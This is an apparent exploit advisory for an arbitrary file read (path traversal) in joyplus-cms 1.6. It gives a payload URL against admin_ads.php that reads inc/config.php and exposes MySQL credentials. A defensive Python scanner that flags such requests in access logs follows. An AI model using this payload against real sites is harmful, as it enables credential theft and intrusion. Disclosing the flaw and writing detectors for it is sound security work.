Title: joyplus-cms 1.6 - Arbitrary file read vulnerability
Date: 2020-02-25
Exploit Author: Zeo
Vendor Homepage: https://github.com/joyplus/joyplus-cms and http://www.joyplus.tv
Software Link: https://github.com/joyplus/joyplus-cms
Version: 1.6
Tested on: Windows 7
joyplus-cms 1.6 has an arbitrary file read vulnerability
that would allow an attacker to read sensitive website information, such as the MySQL or FTP password.
Proof:
1. Install the site normally and log in:
http://127.0.0.1/joyplus-cms/manager/index.php?action=login
2. Access the following URL to trigger the vulnerability:
payload
http://127.0.0.1/joyplus-cms/manager/admin_ads.php?action=edit&file=../../../inc/config.php
You can switch to any directory, e.g. file=../../../inc/config.php
3. Read the code of "\joyplus-cms\inc\config.php", which gives away the MySQL password.
You can switch to any directory; just change the parameter to file=../../../xx.xx
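
A defender-side check for the request pattern shown in the proof, added here as an example (not code from joyplus-cms or from this report): it scans web access logs for admin_ads.php requests whose file parameter leaves its directory. The log lines are constructed samples, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not taken from a real server).
PREFIX = '127.0.0.1 - - [25/Feb/2020:10:00:00 +0000] "GET /joyplus-cms/manager/'
SAMPLE_LOG = [
    PREFIX + 'index.php?action=login HTTP/1.1" 200 900',
    PREFIX + 'admin_ads.php?action=edit&file=banner.html HTTP/1.1" 200 512',
    PREFIX + 'admin_ads.php?action=edit&file=../../../inc/config.php HTTP/1.1" 200 2048',
    PREFIX + 'admin_ads.php?action=edit&file=..%2F..%2F..%2Finc%2Fconfig.php HTTP/1.1" 200 2048',
    PREFIX + 'admin_ads.php?action=edit&file=..%5C..%5Cinc%5Cconfig.php HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly; a proxy or the app may decode more than once."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(file_value):
    """True if the value is absolute or contains a '..' path segment."""
    path = fully_decode(file_value).replace("\\", "/")  # Windows separators too
    if path.startswith("/") or re.match(r"[A-Za-z]:", path):
        return True
    return ".." in path.split("/")


def suspicious_requests(lines, script="admin_ads.php"):
    """Return request targets for `script` whose file parameter escapes its directory."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/" + script):
            continue
        # parse_qs already percent-decodes once; is_traversal handles further layers.
        if any(is_traversal(v) for v in parse_qs(url.query).get("file", [])):
            hits.append(match.group(1))
    return hits
```

A hit with a 200 response on a host running joyplus-cms 1.6 is a reason to rotate the credentials stored in inc/config.php.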